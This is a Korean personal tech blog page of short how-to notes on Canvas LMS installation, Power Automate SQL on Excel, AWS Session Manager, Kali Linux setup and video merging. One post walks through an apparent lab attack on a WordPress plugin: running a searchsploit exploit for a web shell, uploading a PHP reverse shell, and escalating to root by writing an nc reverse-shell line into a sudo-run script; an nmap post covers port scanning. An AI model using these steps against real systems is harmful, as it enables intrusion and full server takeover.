StoryCode

Install.Canvas.Ubuntu.22.04

Canvas LMS
반응형

참조 : https://www.linode.com/docs/guides/install-canvas-lms-on-ubuntu-2004/#install-apache

 

A. Install Apache

1) sudo apt install dirmngr gnupg
2) sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 561F9B9CAC40B2F7

3) sudo apt-key list # 확인
4) sudo apt install apt-transport-https ca-certificates

 

5) sudo sh -c 'echo deb https://oss-binaries.phusionpassenger.com/apt/passenger bionic main > /etc/apt/sources.list.d/passenger. List'

6) sudo apt update

 

7) sudo apt-get install -y libapache2-mod-passenger
8) sudo apt install -y apache2 apache2-dev passenger

9) passenger -v

10) sudo a2enmod passenger rewrite

11) systemctl restart apache2

 

B.Install PostgreSQL

1) sudo apt-get install postgresql

2) cd ~postgres

3) sudo -u postgres createuser canvas --no-createdb --no-superuser --no-createrole --pwprompt

4) sudo -u postgres created canvas_production --owner=canvas
5) sudo -u postgres psql -c "alter user $USER with superuser" postgres

=> sudo -u postgres psql -c "alter user canvas with superuser" postgres

 

 

 

C.

 

 

반응형

Chrome Browser Rendering FPS 측정

JavaScript, ECMAScript
반응형

1) 우측 상단 점세개 클릭

2) Run command 선택 ( C + S + P )

3) show frames per second 입력후 엔터

4) 좌측 상단에 프레임이 보임.

반응형

Power Automate.SQL.기본

사무, 엑셀, Excel
반응형

1) 시작메뉴에서 automate 쳐서 실행후

 

2) 우선 도움용으로, "예" 탭에서 "Excel 자동화" 선택후 "SQL을 사용하여 Excel 처리" 더블 클릭하면 샘플이 뜬다.

 

3)  "새흐름" 클릭해서 새 창이 뜨면 여기에 2)번과 유사한 순서대로 만든다.

 

3.1) 왼쪽 상단에서 "특수 폴더 가져오기" 검색 후 등록

- 특수 폴더는 윈도우에서 제공하는 고정된 폴더만 지정 가능함

- 다른 버전의 윈도우에서 쓰더라도 호환되도록 하기 위함인듯 함.

- 여기서는 "바탕화면"을 선택하니, SpecialFolderPath 변수가 생성됨. SpecialFolderPath 는 바로 아래 Excel_file_Path 에서 사용됨.

 

3.2) 왼쪽 상단에서 "변수 설정" 검색 후 등록

변수 : Excel_File_Path

값 : %SpecialFolderPath%\2022-575.automate\data.xlsx

*참고로 data.xlsx

  A B
1 Key Value
2 1 1111
3 2 2222
4 3 3333

 

3.3) 왼쪽 상단에서 "SQL 연결 활성화" 검색후 등록

Provider=Microsoft.ACE.OLEDB.12.0;Data Source=%Excel_File_Path%;Extended Properties="Excel 12.0 Xml;HDR=YES";

 

3.4) 왼쪽 상단에서 "SQL 문 실행" 검색후 등록. SELECT 용

SELECT
*
FROM
[Sheet1$]

주의 1) Automate 창 오른쪽 "흐름변수" 란내에 QueryResult 결과가 나타난다.

 

3.5) 왼쪽 상단에서 "SQL 문 실행" 검색후 등록. UPDATE 용

UPDATE [Sheet1$]
SET [Value] = 9999
WHERE [Key] = 1;

주의 1) Key 값이 숫자인지 문자인지를 따진다. 엑셀이 숫자인데, 문자 '1' 로 검색하면 오류가 남.

3.6) 왼쪽 상단에서 "SQL 연결 종료" 검색후 등록

%SQLConnection%

 

3.7) 상단에서 삼각형 (=실행) 버튼 누르면 실행되고, 1111 값이 9999 로 변경된다.

 

 

반응형

'사무, 엑셀, Excel' 카테고리의 다른 글

수식, Fomula,단축키.중간단계 점검  (0) 2023.01.30
암호,Password,풀기  (0) 2023.01.30
Shaping Arrays Function  (0) 2022.10.12
vlookup, index, match  (0) 2022.01.06
vba.여러 셋의 세로데이터를 가로 데이타로  (0) 2021.01.25

nmap.기본

보안, 해킹, Hacking, nmap, exploit
반응형

- 포트 스캔툴

- nmap.org

알려진 포트 스캔 nmap 192.168.11.10
포트 하나 스캔 nmap 192.168.11.10 -p 22
포트 전체 스캔 nmap 192.168.11.10 -p-
배너 그래빙 스캔
service 종류와 버전을 보여준다.
ex> 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
nmap 192.168.11.10 -sV
OS 스캔 (예측이지 정확한건 아님) nmap -O 192.168.11.10
Oracle Port
-Pn : Ping no
nmap -Pn -p 1521 192.168.11.10
STATE = filtered 면 Port Closed
   

 

# 참조 : https://hagsig.tistory.com/94

# 참조 : https://ctos-master.tistory.com/17

반응형

pem-key to ppk.ver2 (not ver3)

AWS, 아마존
반응형

# 참조 : https://hyunsoft.tistory.com/entry/ppk-%EB%A7%8C%EB%93%9C%EB%8A%94-%EB%B2%95-%EB%B0%8F-PuTTY-key-format-too-new-%EC%98%A4%EB%A5%98-%ED%95%B4%EA%B2%B0%EB%B2%95

 

반응형

'AWS, 아마존' 카테고리의 다른 글

aws.ec2.putty.Server refused our key  (0) 2023.03.12
AWS.Systems Manager Session Manager.SSH 접근 대신하기  (0) 2022.11.02
CloudFront, S3  (0) 2022.10.25
AWS.Cli.Pricing  (0) 2022.10.19
AWS.Cli.EC2  (0) 2022.10.19

2022-548.kalilinux.searchsploit.wordpress

보안, 해킹, Hacking, nmap, exploit
반응형

# 1단계. 정보확인

nmap -sV ip # 포트 스캔

nmap -p- -sV ip # 전체 포트 스캔

 

searchsploit wordpress | grep -i "learndash" | grep -i ".py" # searchsploit 으로 해킹 가능 목록 검색. 특히 py 실행으로 콘솔획득 목표. grep RCE 로 Remote Code Execution 획득.

 

cp /usr/share/exploitdb/exploits/php/webapps/12345.py ./exploit.py # 12345.py 은 샘플

 

python exploit.py # 사용법부터 확인

 

python exploit.py http://192.168.11.10 # 사용법대로 실행. 192.168.11.10 은 해킹할 서버 ip. WebShell을 획득

> RCE $ ls

리스트....

> RCE $ id # 현재 일반 사용자. 루트 획득 필요.

uid=33( www-data ) gid=33( www-data ) groups=33( www-data )

 

 

# 2 단계. 악성 php reverse shell 올려서 실제 쉘 얻기

 

Local> google.php reverse shell.pentestmonkey/php-reverse-shell.php 로컬 다운로드후  php-reverse-shell.php 편집해서 ip를 로컬ip로, port 를 7777 로 수정후 저장

 

Local> python3 -m http.server 5555

 

WebShell> wget http://localhostip:5555/php-reverse-shell.php

> RCE $ ls

# php-reverse-shell.php # 이 파일이 보여야 함.

> RCE $ pwd

# 현재 위치 확인

 

Local> nc -nlvp 7777

# 서버에서 Local:7777 로 접속하기를 기다린다.

 

<Chrome> http://192.168.11.10/bootstrap/img/php-reverse-shell.php

# 서버에서 Local:7777 로 접속하게 하고, nc 가 터미널을 사용할 수 있도록 해준다.

 

nc$ python3 -c "import pty;pty.spawn('/bin/bash')"

# Local.nc.터미널 접속후, bash 획득하기

 

nc$ sudo -l # sudo 로 실행시 root 암호 묻지 않고 실행해주는 목록 확인

(ALL) NOPASSWD: /usr/bin/perl /home/user/backup.pl

 

nc$ cat /home/user/backup.pl # root 권한임

#! /usr/bin/perl

system("sh", "/etc/copy.sh");

 

nc$ cat /etc/copy.sh # backup.pl 로부터 상속받아 root 권한이 될수 있는게 copy.sh. 아래 내용을 copy.sh 에 넣어야 함.

# rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|bin/sh -i 2>&1|nc local내ip 4444 >/tmp/f

echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|bin/sh -i 2>&1|nc local내ip 4444 >/tmp/f" > /etc/copy.sh

 

Local> nc -nlvp 4444

 

nc$ sudo /usr/bin/perl /home/user/backup.pl

반응형

'보안, 해킹, Hacking, nmap, exploit' 카테고리의 다른 글

nmap.Powershell.포트스캔(1...999).특정ip  (0) 2024.03.26
nmap.기본  (0) 2022.11.18
kalilinux.설치.Notebook  (0) 2022.11.01
kalilinux.설치.VMWare  (0) 2022.06.20

AWS.Systems Manager Session Manager.SSH 접근 대신하기

AWS, 아마존
반응형

# 참조 : https://www.youtube.com/watch?v=2Xb2JXV5Llo

 

■ 문제점 : SSH 접근의 문제점

1) EC2 별로 Key 파일(=PEM) 필요

2) 다른 유저에게도 Key 파일 공유. Key 파일 유출 발생

3) 로그인 이력 보기 어려움.

4) Key 파일 변경시 모든 EC2 를 다 바꿔야 함.

5) Private Network 내 EC2 는 외부에서 직접 접근이 불가능하니, Public Network 내 Bastion EC2 의 Tunneling 을 통해 접근하는 불편함.

 

해결책 : Systems Manager Session Manager

EC2 를 "브라우저 기반 Shell" 혹은 "AWS CLI" 로 관리. 온프레미스 인스턴스, 가상머신도 가능

 

- 원클릭 액세스 제공

- SSH 연결 불필요. 포트 불필요

- IAM 유저 단위 제어 가능 ( Key 파일 불필요 )

 

 

 사용법

- Amazon Linux Instance 사용권유, SSM 디폴트 설치가 되어 있기 때문.

 

순서 1) IAM Role (역할) : 역할만들기 > EC2 > 정책필터=SSM.AmazonEC2RoleforSSM 체크 > "SSM Role 이름" 입력후 저장

순서 2) EC2 생성시 IAM 역할에서 "SSM Role 이름" 선택후 생성. (보안그룹에서 SSH 를 빼도 됨)

순서 3) Key Pair 선택에서는 "키 페어 없이 계속".

순서 4) Systems Manager > Session Manager > 세션 시작 > 인스턴스 선택후 하단에 세션시작버튼 클릭

 

반응형

'AWS, 아마존' 카테고리의 다른 글

aws.ec2.putty.Server refused our key  (0) 2023.03.12
pem-key to ppk.ver2 (not ver3)  (0) 2022.11.14
CloudFront, S3  (0) 2022.10.25
AWS.Cli.Pricing  (0) 2022.10.19
AWS.Cli.EC2  (0) 2022.10.19

kalilinux.설치.Notebook

보안, 해킹, Hacking, nmap, exploit
반응형

1) Win Disk Imager 설치

https://sourceforge.net/projects/win32diskimager/

* Google Drive 종료시키야 Win Disk Imager 가 실행됨.

 

2) Kali ISO 다운로드

https://www.kali.org/downloads/

Installer Image > 64bit > Recommended

 

3) Win Disk Imager 로 Kali ISO 를 USB 에 Write 한 후, USB 부팅

 

4) 다른 건 그냥 넘어가는데, wifi 가 문제됨.

공유기에서 WPA PSK 는 안됨. WPA2 PSK 도 안됨.

"WPA/WPA2 mixed mode - PSK TKIP/AES mixed mode" 만 됨.

5) Continue...

 

6) /dev/sda

 

7) sudo apt-get update

sudo apt-get install ssh

sudo service ssh start

nmap localhost

sudo vim /etc/ssh/sshd_config

    PermitRootLogin yes #추가

sudo service ssh restart

# putty 접속 안됨 (이걸로도 안됨) : https://hack-cracker.tistory.com/207

# 유선 -> 공유기 -> 무선이 안되는 듯. ping 도 안감.

# 노트북에 무선밖에 없어서, USB 유선 구매해서 연결하니 바로 ssh 연결됨. ( connection refused 나면 ssh service 재시작해볼것 )

반응형

'보안, 해킹, Hacking, nmap, exploit' 카테고리의 다른 글

nmap.Powershell.포트스캔(1...999).특정ip  (0) 2024.03.26
nmap.기본  (0) 2022.11.18
2022-548.kalilinux.searchsploit.wordpress  (0) 2022.11.08
kalilinux.설치.VMWare  (0) 2022.06.20

CPU

IT 용어, 인터넷 활용 등등
반응형

# 참조 : https://nosearch.com/contents/guide/digitalit/notebook

 

 

반응형

동영상.Windows11기본기능.합치기

사무
반응형

# 참조 : https://cookie6.tistory.com/199

ffmpeg 으로 합치기 했는데 오류가 나서 다른 방법을 찾던 중 Windows 기본 기능으로 합칠 수 있게 되었다.

 

1. 탐색기에서 첫 동영상 오른쪽 클릭후 연결프로그램 > 사진 메뉴 클릭

 

2. 우측 상단 삼선바 에서 "텍스트가 있는 비디오 만들기" 클릭

 

3. 파일명을 소팅 순서대로 변경. 파일명 앞에 번호를 붙인다던가

 

4. 우측 상단에 "+ 추가" 버튼을 눌러서 동영상 목록을 전체 불러오기 ( 단, 첫번째는 이미 불러와져 있으니 제외 )

불러오면 라이브러리에 추가된다.

 

5. 라이브러리에 추가된 동영상들을 선택하여 하단으로 드래그 앤 드랍

 

6. 우측 상단에 "비디오 마침" 클릭후 내보내기 클릭

 

7. 합쳐지기 시작하며 다만 시간이 많이 걸림

반응형